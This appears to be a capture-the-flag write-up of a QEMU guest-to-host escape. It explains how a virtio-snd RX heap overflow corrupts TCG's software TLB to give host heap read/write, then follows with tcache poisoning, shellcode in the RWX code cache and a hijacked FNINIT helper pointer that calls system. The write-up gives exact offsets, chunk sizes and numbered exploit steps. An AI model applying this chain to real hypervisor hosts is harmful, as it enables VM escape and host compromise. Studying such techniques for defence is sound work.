the host address a virtual address maps to is dependent on the physical address, so we can get a reliable location in the mapping space by having our vaddr tied to a fixed physical address like 0. the thread heap arena is consistently 0x7e00000 bytes behind the host mapping for physical address 0. 0x7e0 & 0x3f is also 0 so this will be placed at index 0 in the table making it easy to overflow into. so we first map 0x7e00000 to 0, and now overflow the virtual addresses to 0, and when we deref 0 it will hit the TLB and translate as (intended host address - 0x7e00000) + 0 which we have established is just the thread heap arena.

so now we have arb read/write into the first page of the arena which contains things like tcache bins and various pointers to other regions. i leaked the rwx region and main heap, then overwrote two tcache entries to first write shellcode to the rwx region and then overwrite a function pointer in the main heap with a pointer to the shellcode.

all of the past qemu exploits i’ve seen for real vulns usually try to get some explicit leak primitive either from a separate vuln or some random device, but i think it’s cool that it’s theoretically possible in a stable enough environment to do this sort of leakless technique. it does rely on TCG though, maybe i’ll try this challenge again but with KVM and see if it’s still possible.

The compiled kernel doesn’t expose much / if anything to interact with the device, so my solver patches in a couple utilities using the physical r/w:

  • virtual to physical
  • remapping a userspace virtual page to an arbitrary guest physical 4 KiB page
  • install a 2MiB page-table mapping
  • invlpg
  • (setuid)

TLB / Target

A quick recap on TLBs: a normal CPU has a Translation Lookaside Buffer (TLB), a cache for page table translations. Instead of walking page tables on every memory access, the CPU remembers that a virtual page recently translated to a particular physical page with particular permissions:

virtual address
|
v
TLB lookup: virtual page -> physical page + permissions
|
v
memory access

When an operating system changes page tables, old cached translations may no longer be correct. A TLB flush invalidates those cached translations. On x86, invlpg addr invalidates the cached translation for one virtual page, while operations such as CR3 reloads can invalidate many entries.

In this exploit, however, the interesting TLB is not the host CPU’s hardware TLB. The interesting object is QEMU TCG’s software TLB. TCG-generated host code also wants memory accesses to be fast, so QEMU keeps its own cache of guest virtual address translations. That cache lives in normal QEMU heap memory. For a guest RAM access in system emulation, the path is roughly:

guest virtual address
|
v
QEMU TCG software TLB lookup
|
+-- hit -> host pointer = guest address + entry.addend
|
+-- miss -> slow path walks guest page tables, fills TLB entry

The fast entry type is CPUTLBEntry:

include/exec/tlb-common.h
#define CPU_TLB_ENTRY_BITS (HOST_LONG_BITS == 32 ? 4 : 5)
/* Minimalized TLB entry for use by TCG fast path. */
typedef union CPUTLBEntry {
    struct {
        uintptr_t addr_read;
        uintptr_t addr_write;
        uintptr_t addr_code;
        /*
         * Addend to virtual address to get host address. IO accesses
         * use the corresponding iotlb value.
         */
        uintptr_t addend;
    };
    /*
     * Padding to get a power of two size, as well as index
     * access to addr_{read,write,code}.
     */
    uintptr_t addr_idx[(1 << CPU_TLB_ENTRY_BITS) / sizeof(uintptr_t)];
} CPUTLBEntry;
QEMU_BUILD_BUG_ON(sizeof(CPUTLBEntry) != (1 << CPU_TLB_ENTRY_BITS));

The three addr_* fields are compare values for read, write, and instruction fetch accesses. The addend is the part that turns a guest virtual address into a host pointer:

accel/tcg/cputlb.c
/* Everything else is RAM. */
*phost = (void *)((uintptr_t)addr + entry->addend);
return flags;

So this is a good primitive to target, since it directly decides which host address QEMU reads or writes. The lookup table is indexed by the guest virtual page:

accel/tcg/cputlb.c
static inline uintptr_t tlb_index(CPUState *cpu, uintptr_t mmu_idx,
                                  vaddr addr)
{
    uintptr_t size_mask = cpu_tlb_fast(cpu, mmu_idx)->mask >> CPU_TLB_ENTRY_BITS;
    return (addr >> TARGET_PAGE_BITS) & size_mask;
}

For the minimum table size used later, there are 64 entries, so the mask is 0x3f. Guest address 0 and guest address 0x8000000 both land in index 0:

(0x0 >> 12) & 0x3f = 0
(0x8000000 >> 12) & 0x3f = 0

That lets the exploit first create a legitimate entry for 0x8000000, then corrupt only the compare fields so the same entry also appears valid for guest address 0.
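The index collision is easy to verify. The sketch below re-implements the tlb_index arithmetic in JavaScript, assuming 4 KiB guest pages (TARGET_PAGE_BITS = 12) and the 64-entry minimum table; tlbIndex and MIN_TLB_ENTRIES are names made up for this example.

```javascript
const TARGET_PAGE_BITS = 12; // 4 KiB guest pages on x86
const MIN_TLB_ENTRIES = 64;  // minimum table size, so the index mask is 0x3f

// Same arithmetic as tlb_index(): page number masked by (entries - 1).
function tlbIndex(addr, entries = MIN_TLB_ENTRIES) {
  const sizeMask = BigInt(entries - 1);
  return Number((BigInt(addr) >> BigInt(TARGET_PAGE_BITS)) & sizeMask);
}

console.log(tlbIndex(0x0), tlbIndex(0x8000000), tlbIndex(0x1000));
```

Any guest address whose page number is a multiple of 64 shares slot 0, which also covers the 0x7e00000 address used in the Bassoon writeup quoted above.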

Before corruption, entry 0 looks like:

CPUTLBEntry[0]
+-----------------------------------+
| addr_read = 0x8000000 | flags |
| addr_write = 0x8000000 | flags |
| addr_code = ... |
| addend = host_ptr - 0x8000000 |
+-----------------------------------+

After the virtio-snd overflow writes into the first 0x10 bytes:

CPUTLBEntry[0]
+-----------------------------------+
| addr_read = 0 |
| addr_write = 0 |
| addr_code = ... |
| addend = host_ptr - 0x8000000 |
+-----------------------------------+

Now a guest load from virtual address 0 can pass the fast-path compare, but the preserved addend still points at the host location derived from the old 0x8000000 translation:

host = 0 + (host_ptr - 0x8000000)

For us that lands inside QEMU’s host heap.
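The before/after behavior can be modeled in a few lines. This is a deliberately simplified sketch of the fast path: it compares only the page part of addr_read and ignores the flag bits QEMU keeps in the low bits of the compare fields. HOST_PTR is a made-up host address and translateRead is a hypothetical helper, not a QEMU function.

```javascript
const PAGE_MASK = ~0xfffn; // clears the low 12 bits of a BigInt address

// Simplified fast-path load: compare the page, then add the addend.
function translateRead(entry, guestAddr) {
  const page = guestAddr & PAGE_MASK;
  if ((entry.addr_read & PAGE_MASK) !== page) return null; // miss: slow path
  return BigInt.asUintN(64, guestAddr + entry.addend);
}

const HOST_PTR = 0x7f0000000000n; // hypothetical host address backing guest 0x8000000
const entry = {
  addr_read: 0x8000000n,
  addr_write: 0x8000000n,
  addend: HOST_PTR - 0x8000000n,
};

const hitBefore = translateRead(entry, 0x8000000n); // legitimate translation
const missBefore = translateRead(entry, 0x10n);     // guest 0x10 is not cached yet

// Model the overflow: only the compare fields change, the addend is preserved.
entry.addr_read = 0n;
entry.addr_write = 0n;
const hitAfter = translateRead(entry, 0x10n);

console.log(hitBefore, missBefore, hitAfter);
```

After the corruption, a guest access to low addresses resolves to HOST_PTR - 0x8000000 plus the offset, which is the displacement the exploit relies on.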

Primitives

A QEMU TLB flush invalidates entries in this software cache. For a full flush of one MMU index, QEMU clears the entry table and resets accounting:

accel/tcg/cputlb.c
static void tlb_mmu_flush_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast)
{
    desc->n_used_entries = 0;
    desc->large_page_addr = -1;
    desc->large_page_mask = -1;
    desc->vindex = 0;
    memset(fast->table, -1, sizeof_tlb(fast));
    memset(desc->vtable, -1, sizeof(desc->vtable));
}

For a single-page flush, QEMU normally invalidates one table entry. But QEMU also tracks large-page translations. If the flushed page belongs to a tracked large page, tlb_flush_page_locked() escalates to a full flush for that MMU index:

accel/tcg/cputlb.c
static void tlb_flush_page_locked(CPUState *cpu, int midx, vaddr page)
{
    vaddr lp_addr = cpu->neg.tlb.d[midx].large_page_addr;
    vaddr lp_mask = cpu->neg.tlb.d[midx].large_page_mask;
    /* Check if we need to flush due to large pages. */
    if ((page & lp_mask) == lp_addr) {
        tlb_flush_one_mmuidx_locked(cpu, midx, get_clock_realtime());
    } else {
        if (tlb_flush_entry_locked(tlb_entry(cpu, midx, page), page)) {
            tlb_n_used_entries_dec(cpu, midx);
        }
        tlb_flush_vtlb_page_locked(cpu, midx, page);
    }
}

We can use this by, for example, flipping a mapped guest region to PROT_NONE and back to PROT_READ | PROT_WRITE. Inside the guest, that makes the kernel update page tables and flush stale guest translations. In TCG, those guest invalidations cause QEMU to throw away the affected software TLB entries.

Then with our inserted invlpg primitive, we can install HUGE_VADDR as a 2 MiB mapping. The i386 TCG helper for invlpg reaches:

target/i386/tcg/system/misc_helper.c
void helper_flush_page(CPUX86State *env, target_ulong addr)
{
tlb_flush_page(env_cpu(env), addr);
}

Because HUGE_VADDR is a large mapping, QEMU’s large-page tracking can turn that single-page invalidation into the full-MMU-index flush path. That matters because the resize logic is tied to full-table flushing.

The TCG TLB tables are dynamic. QEMU tracks how many entries were used in a short time window. When a flush happens, tlb_mmu_resize_locked() may grow or shrink the table based on that recent usage rate.

The important part for exploitation is that a resize is a normal heap free and allocation:

accel/tcg/cputlb.c
static void tlb_mmu_resize_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast,
int64_t now)
{
size_t old_size = tlb_n_entries(fast);
size_t rate;
size_t new_size = old_size;
int64_t window_len_ms = 100;
int64_t window_len_ns = window_len_ms * 1000 * 1000;
bool window_expired = now > desc->window_begin_ns + window_len_ns;
if (desc->n_used_entries > desc->window_max_entries) {
desc->window_max_entries = desc->n_used_entries;
}
rate = desc->window_max_entries * 100 / old_size;
if (rate > 70) {
new_size = MIN(old_size << 1, 1 << CPU_TLB_DYN_MAX_BITS);
} else if (rate < 30 && window_expired) {
size_t ceil = pow2ceil(desc->window_max_entries);
size_t expected_rate = desc->window_max_entries * 100 / ceil;
/*
* Avoid undersizing when the max number of entries seen is just below
* a pow2. For instance, if max_entries == 1025, the expected use rate
* would be 1025/2048==50%. However, if max_entries == 1023, we'd get
* 1023/1024==99.9% use rate, so we'd likely end up doubling the size
* later. Thus, make sure that the expected use rate remains below 70%.
* (and since we double the size, that means the lowest rate we'd
* expect to get is 35%, which is still in the 30-70% range where
* we consider that the size is appropriate.)
*/
if (expected_rate > 70) {
ceil *= 2;
}
new_size = MAX(ceil, 1 << CPU_TLB_DYN_MIN_BITS);
}
if (new_size == old_size) {
if (window_expired) {
tlb_window_reset(desc, now, desc->n_used_entries);
}
return;
}
g_free(fast->table);
g_free(desc->fulltlb);
tlb_window_reset(desc, now, 0);
/* desc->n_used_entries is cleared by the caller */
fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS;
fast->table = g_try_new(CPUTLBEntry, new_size);
desc->fulltlb = g_try_new(CPUTLBEntryFull, new_size);
/*
* If the allocations fail, try smaller sizes. We just freed some
* memory, so going back to half of new_size has a good chance of working.
* Increased memory pressure elsewhere in the system might cause the
* allocations to fail though, so we progressively reduce the allocation
* size, aborting if we cannot even allocate the smallest TLB we support.
*/
while (fast->table == NULL || desc->fulltlb == NULL) {
if (new_size == (1 << CPU_TLB_DYN_MIN_BITS)) {
error_report("%s: %s", __func__, strerror(errno));
abort();
}
new_size = MAX(new_size >> 1, 1 << CPU_TLB_DYN_MIN_BITS);
fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS;
g_free(fast->table);
g_free(desc->fulltlb);
fast->table = g_try_new(CPUTLBEntry, new_size);
desc->fulltlb = g_try_new(CPUTLBEntryFull, new_size);
}
}

So by touching many guest pages, we can make the table grow. This raises desc->n_used_entries and therefore window_max_entries; once the used-entry rate crosses 70%, QEMU doubles the table. Later, after the target 0x810 RX hole has been freed, we do the opposite: touch only one or a few pages, trigger a flush, wait for the 100 ms resize window to expire, and trigger another flush. At that point window_max_entries is tiny relative to the old table, so rate < 30 and QEMU shrinks to MAX(pow2ceil(window_max_entries), 1 << CPU_TLB_DYN_MIN_BITS). With one useful entry, that is the minimum fast table: 64 entries.

64 * sizeof(CPUTLBEntry)
64 * 0x20 = 0x800-byte allocation
glibc chunk size = 0x810
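
The grow and shrink decisions can be replayed outside QEMU with a small model of the sizing rule. This is a sketch: the `model_*` names are hypothetical, the minimum of 64 entries comes from the text above, and the upper cap is an assumed value since the real one depends on the build.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_DYN_MIN_BITS 6   /* 64 entries, as stated above */
#define MODEL_DYN_MAX_BITS 22  /* assumed cap for this sketch */

/* Smallest power of two >= v (returns 1 for v == 0). */
static size_t model_pow2ceil(size_t v)
{
    size_t p = 1;
    while (p < v) {
        p <<= 1;
    }
    return p;
}

/* Mirrors the sizing rule of tlb_mmu_resize_locked() without any allocation. */
static size_t model_tlb_new_size(size_t old_size, size_t window_max_entries,
                                 int window_expired)
{
    const size_t min_size = (size_t)1 << MODEL_DYN_MIN_BITS;
    const size_t max_size = (size_t)1 << MODEL_DYN_MAX_BITS;
    size_t new_size = old_size;
    size_t rate;

    assert(old_size != 0);
    rate = window_max_entries * 100 / old_size;
    if (rate > 70) {
        /* Heavy use: double, up to the cap. */
        new_size = old_size << 1;
        if (new_size > max_size) {
            new_size = max_size;
        }
    } else if (rate < 30 && window_expired) {
        /* Light use and the window is over: shrink towards actual usage. */
        size_t target = model_pow2ceil(window_max_entries);
        size_t expected_rate = window_max_entries * 100 / target;
        if (expected_rate > 70) {
            target *= 2;
        }
        new_size = target > min_size ? target : min_size;
    }
    return new_size;
}
```

With one used entry and an expired window, a 4096-entry table comes back as 64 entries in this model. Without the expired window the size does not change, which is why the shrink needs the 100 ms wait between the two flushes.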

First, a note on our virtio-snd primitives. The buffer type we work with is:

include/hw/audio/virtio-snd.h
/*
* VirtIOSoundPCMBuffer has a dynamic size since it includes the raw PCM data
* in its allocation. It must be initialized and destroyed as follows:
*
* size_t size = [[derived from owned VQ element descriptor sizes]];
* buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
* buffer->elem = [[owned VQ element]];
*
* [..]
*
* g_free(buffer->elem);
* g_free(buffer);
*/
struct VirtIOSoundPCMBuffer {
QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;
VirtQueueElement *elem;
VirtQueue *vq;
size_t size;
/*
* In TX / Plaback, `offset` represents the first unused position inside
* `data`. If `offset == size` then there are no unused data left.
*/
uint64_t offset;
/* Used for the TX queue for lazy I/O copy from `elem` */
bool populated;
/*
* VirtIOSoundPCMBuffer is an unsized type because it ends with an array of
* bytes. The size of `data` is determined from the I/O message's read-only
* or write-only size when allocating VirtIOSoundPCMBuffer.
*/
uint8_t data[];
};

On the target build, data[] starts at offset 0x29, and sizeof(VirtIOSoundPCMBuffer) rounds to 0x30.
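
Those two numbers can be checked with a layout-equivalent struct. The sketch below assumes an LP64 x86-64 build; `ModelPCMBuffer` is a hypothetical mirror of the fields quoted above, with a single pointer standing in for `QSIMPLEQ_ENTRY`, and the request helpers simply restate the `g_malloc0()` size expressions of the RX and TX handlers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of VirtIOSoundPCMBuffer (LP64 layout assumed). */
typedef struct ModelPCMBuffer {
    struct ModelPCMBuffer *next; /* QSIMPLEQ_ENTRY is one next pointer */
    void *elem;
    void *vq;
    size_t size;
    uint64_t offset;
    bool populated;
    uint8_t data[];
} ModelPCMBuffer;

/* sizeof(virtio_snd_pcm_status): two 32-bit fields. */
#define MODEL_PCM_STATUS_SIZE 8

/* Bytes requested by the RX handler for a given writable length. */
static size_t model_rx_request(size_t in_len)
{
    assert(in_len >= MODEL_PCM_STATUS_SIZE);
    return sizeof(ModelPCMBuffer) + (in_len - MODEL_PCM_STATUS_SIZE);
}

/* Bytes requested by the TX handler for a given payload length. */
static size_t model_tx_request(size_t data_len)
{
    return sizeof(ModelPCMBuffer) + data_len;
}
```

On such a build `offsetof(ModelPCMBuffer, data)` is 0x29 and `sizeof(ModelPCMBuffer)` is 0x30, so the payload starts 7 bytes before the nominal end of the header.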

We have two ways to allocate within the driver:

hw/audio/virtio-snd.c
/*
* The rx virtqueue handler. Makes the buffers available to their respective
* streams for consumption.
*
* @vdev: VirtIOSound device
* @vq: rx virtqueue
*/
static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)
{
VirtIOSound *vsnd = VIRTIO_SND(vdev);
VirtIOSoundPCMBuffer *buffer;
VirtQueueElement *elem;
size_t msg_sz, size;
virtio_snd_pcm_xfer hdr;
uint32_t stream_id;
/*
* if any of the I/O messages are invalid, put them in vsnd->invalid and
* return them after the for loop.
*/
bool must_empty_invalid_queue = false;
if (!virtio_queue_ready(vq)) {
return;
}
trace_virtio_snd_handle_rx_xfer();
for (;;) {
VirtIOSoundPCMStream *stream;
elem = virtqueue_pop(vq, sizeof(VirtQueueElement));
if (!elem) {
break;
}
/* get the message hdr object */
msg_sz = iov_to_buf(elem->out_sg,
elem->out_num,
0,
&hdr,
sizeof(virtio_snd_pcm_xfer));
if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {
goto rx_err;
}
stream_id = le32_to_cpu(hdr.stream_id);
if (stream_id >= vsnd->snd_conf.streams
|| !vsnd->pcm.streams[stream_id]) {
goto rx_err;
}
stream = vsnd->pcm.streams[stream_id];
if (stream == NULL || stream->info.direction != VIRTIO_SND_D_INPUT) {
goto rx_err;
}
WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {
size = iov_size(elem->in_sg, elem->in_num) -
sizeof(virtio_snd_pcm_status);
buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
buffer->elem = elem;
buffer->vq = vq;
buffer->size = 0;
buffer->offset = 0;
QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);
}
continue;
rx_err:
must_empty_invalid_queue = true;
buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer));
buffer->elem = elem;
buffer->vq = vq;
QSIMPLEQ_INSERT_TAIL(&vsnd->invalid, buffer, entry);
}
if (must_empty_invalid_queue) {
empty_invalid_queue(vdev, vq);
}
}

With size 0x30 + (in_len - 0x8) = in_len + 0x28, and:

hw/audio/virtio-snd.c
/*
* The tx virtqueue handler. Makes the buffers available to their respective
* streams for consumption.
*
* @vdev: VirtIOSound device
* @vq: tx virtqueue
*/
static void virtio_snd_handle_tx_xfer(VirtIODevice *vdev, VirtQueue *vq)
{
VirtIOSound *vsnd = VIRTIO_SND(vdev);
VirtIOSoundPCMBuffer *buffer;
VirtQueueElement *elem;
size_t msg_sz, size;
virtio_snd_pcm_xfer hdr;
uint32_t stream_id;
/*
* If any of the I/O messages are invalid, put them in vsnd->invalid and
* return them after the for loop.
*/
bool must_empty_invalid_queue = false;
if (!virtio_queue_ready(vq)) {
return;
}
trace_virtio_snd_handle_tx_xfer();
for (;;) {
VirtIOSoundPCMStream *stream;
elem = virtqueue_pop(vq, sizeof(VirtQueueElement));
if (!elem) {
break;
}
/* get the message hdr object */
msg_sz = iov_to_buf(elem->out_sg,
elem->out_num,
0,
&hdr,
sizeof(virtio_snd_pcm_xfer));
if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {
goto tx_err;
}
stream_id = le32_to_cpu(hdr.stream_id);
if (stream_id >= vsnd->snd_conf.streams
|| vsnd->pcm.streams[stream_id] == NULL) {
goto tx_err;
}
stream = vsnd->pcm.streams[stream_id];
if (stream->info.direction != VIRTIO_SND_D_OUTPUT) {
goto tx_err;
}
WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {
size = iov_size(elem->out_sg, elem->out_num) - msg_sz;
buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
buffer->elem = elem;
buffer->populated = false;
buffer->vq = vq;
buffer->size = size;
buffer->offset = 0;
stream->latency_bytes += size;
QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);
}
continue;
tx_err:
must_empty_invalid_queue = true;
buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer));
buffer->elem = elem;
buffer->vq = vq;
QSIMPLEQ_INSERT_TAIL(&vsnd->invalid, buffer, entry);
}
if (must_empty_invalid_queue) {
empty_invalid_queue(vdev, vq);
}
}

With size 0x30 + data_len.

The 0x410 size is important, since it makes the RX overflow land exactly on the fields we want in the next allocation. The vulnerable source is an RX buffer with in_len = 0x3d8:

RX data size = in_len - sizeof(virtio_snd_pcm_status)
= 0x3d8 - 0x8
= 0x3d0
QEMU request = sizeof(VirtIOSoundPCMBuffer) + 0x3d0
= 0x30 + 0x3d0
= 0x400
glibc chunk = request2size(0x400)
= 0x410

The source stream’s period_bytes is 0x3f7, while buffer->data starts at offset 0x29. So the buggy audio write reaches:

0x29 + 0x3f7 = 0x420 bytes from the source user pointer

The next chunk’s user pointer starts 0x410 bytes after the source user pointer, so the overflow reaches:

0x420 - 0x410 = 0x10 bytes into the next allocation

That is exactly two qwords: CPUTLBEntry.addr_read and CPUTLBEntry.addr_write. We can also reuse the 0x410 size for the tcache step, since it is the last default small tcache size:

idx = (0x410 - 0x20) / 0x10 = 0x3f

So we can reuse that size for the arbitrary write as well.
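
The size arithmetic in this section can be re-derived with a few helpers. This is a sketch assuming 64-bit glibc constants (8-byte size field, 0x10 alignment, 0x20 minimum chunk); the `model_*` names are hypothetical and only restate the formulas used above.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_SIZE_SZ 8     /* assumed: size field width on 64-bit glibc */
#define MODEL_ALIGN   0x10  /* assumed: malloc alignment */
#define MODEL_MINSIZE 0x20  /* assumed: smallest chunk */

/* Chunk size glibc would use for a request of `req` bytes. */
static size_t model_request2size(size_t req)
{
    size_t sz = (req + MODEL_SIZE_SZ + MODEL_ALIGN - 1) & ~(size_t)(MODEL_ALIGN - 1);
    return sz < MODEL_MINSIZE ? MODEL_MINSIZE : sz;
}

/* Tcache bin index for a chunk of the given size. */
static size_t model_tcache_idx(size_t chunk_size)
{
    assert(chunk_size >= MODEL_MINSIZE);
    return (chunk_size - MODEL_MINSIZE + MODEL_ALIGN - 1) / MODEL_ALIGN;
}

/*
 * Bytes that land in the next chunk's user data when `write_len` bytes
 * are written starting `data_off` bytes into the source user data.
 */
static size_t model_overflow_into_next(size_t chunk_size, size_t data_off,
                                       size_t write_len)
{
    size_t end = data_off + write_len;
    return end > chunk_size ? end - chunk_size : 0;
}
```

Plugging in the values from above gives a 0x410 chunk for the 0x400 request, tcache index 0x3f, and a 0x10-byte spill for a 0x3f7-byte write at offset 0x29.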

Exploit

Combining this (and a bit of heap grooming), we can achieve something like:

  1. Spray some 0x810 chunks with live virtio-snd TX filler buffers (fill810, TX_HOLE_FILLER_DATA_LEN = 0x7d0).

  2. Spray some 0x410 chunks with live virtio-snd TX guard buffers (guard410, TX_SMALL_FILLER_DATA_LEN = 0x3d0).

  3. Grow the user-mode TLB table. The idea is to shrink the TLB table later so it occupies a 0x810 chunk.

  4. Queue RX source/target pairs. [source RX buffer: 0x410 live] [target RX buffer: 0x810]

  5. Free only the target-side 0x810 chunk(s). This is possible because source and target sit on different streams, so we can free the target alone. [source RX buffer: 0x410 live] [target 0x810 chunk: free]

  6. Shrink the TCG TLB so CPUTLBEntry[64] reclaims a freed 0x810 target hole. [source RX buffer: 0x410 live] [0x810 chunk: TLB table]

  7. Overflow from the live 0x410 source into CPUTLBEntry[0].

  8. Use guest NULL as a host heap page window.

    We can probe this a bit by capturing segfaults from the guest to see if it succeeded. Also, this first page immediately gives us a text leak and a TCG code-cache (rwx) leak.

  9. Edit tcache metadata in that page.

    For arbitrary write we need a bit more, so we find the tcache_perthread_struct, which is in this page, write a pointer into tcache->entries[0x3f], and then request a 0x410 allocation.

  10. Use TX allocations as targeted host writes.

  11. Write an RWX system stub and overwrite helper_info_fninit.func.

  12. Guest executes FNINIT -> helper_info_fninit.func -> rwx region -> system

We can actually stabilize all of this a bit by using, e.g., multiple targets, so that there are multiple holes where the TLB table might get allocated.

Escape V2

Coming soon.